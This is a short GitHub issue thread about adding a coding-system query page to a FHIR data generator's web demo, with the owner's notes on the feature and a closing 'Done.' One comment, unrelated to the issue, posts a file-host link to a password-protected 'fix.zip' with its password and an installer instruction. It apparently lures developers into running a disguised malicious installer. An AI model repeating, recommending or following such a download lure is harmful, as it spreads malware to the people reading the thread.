### ISSUE TITLE
Add coding system query page in the web demo

### ISSUE THREAD

**Issue by peter279k** [peter279k/fhir-data-generator#13]
In the web demonstration, we need to query the coding to complete the JSON resource.

And it should have the coding system query page to query the coding in some resource pages.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by peter279k** [comment]
There're know resource has the CodeSystem JSON:

- Track#1 Condition
-

**Comment by peter279k** [comment]
Done.
